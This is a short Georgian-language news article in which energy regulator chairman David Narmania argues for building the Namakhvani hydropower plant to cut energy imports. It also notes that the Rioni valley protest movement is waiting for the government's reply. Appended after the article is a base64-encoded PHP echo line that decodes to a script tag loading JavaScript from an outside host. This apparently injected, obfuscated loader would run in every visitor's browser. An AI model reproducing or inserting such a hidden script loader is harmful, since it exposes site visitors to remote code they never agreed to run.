celsiusi
ავერსი საქკაბელი
ენერგეტიკისა და წყალმომარაგების მარეგულირებელი ეროვნული კომისიის თავმჯდომარე დავით ნარმანია მიიჩნევს, რომ ქვეყანაში ადგილობრივი ენერგეტიკული რესურსების განვითარება, როგორც ენერგეტიკული უსაფრთხოების, ასევე წმინდა ეკონომიკური თვალსაზრისით, მათ შორის „ნამახვანჰესის” ენერგიის გამომუშავებაც არის სასიცოცხლოდ მნიშვნელოვანი“.
 
მისი განცხადებით, მთავარია გავიგოთ, რა სჭირდება ქვეყანას და მის საზოგადოებას და გათვალისწინებული უნდა იქნეს „სახელმწიფოებრივი ინტერესი“.
  
მისივე თქმით, კონსენსუსი და საერთო ენა აუცილებლად უნდა გამოინახოს. მთავრობასა და „ნამახვანჰესის“ მოწინააღმდეგე საზოგადოებას შორის, ჰესის აშენების საკითხზე რაციონალური გადაწყვეტილება უნდა იქნეს მიღებული.
 
„მე, როგორც მარეგულირებელი კომისიის ხელმძღვანელი, ვხედავ ჩვენს ქვეყანაში ენერგიის დეფიციტს და, შესაბამისად, ჩვენი ენერგიის დეფიციტი ივსება იმპორტით. როცა ენერგიის დეფიციტი ივსება იმპორტით, ეს ნიშნავს, რომ სიმწრით მოგროვებული, ლარებში გადახდილი ენერგიის თანხა უნდა დახურდავდეს დოლარებში და უნდა იქნას გადარიცხული. რამდენიმე ქვეყანაში, საიდანაც ჩვენ ვახორციელებთ იმპორტს. სწორედ იქ გაედინება ჩვენგან ვალუტა, რაც მაკროეკონომიკური თვალსაზრისითაც, არ არის სასურველი ჩვენი ქვეყნის ეკონომიკისთვის“, - აცხადებს დავით ნარმანია.
 
შეგახსენებთ, რომ მოძრაობის "რიონის ხეობის გადარჩენისთვის" წევრები დღეს ხელისუფლებისგან პასუხს ელიან, დაკმაყოფილდება თუ არა მათი სამი მთავარი მოთხოვნა, რის შემდეგაც შესაძლებელი იქნება სრულფასოვანი დიალოგის გაგრძელება.
 
 
2922
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");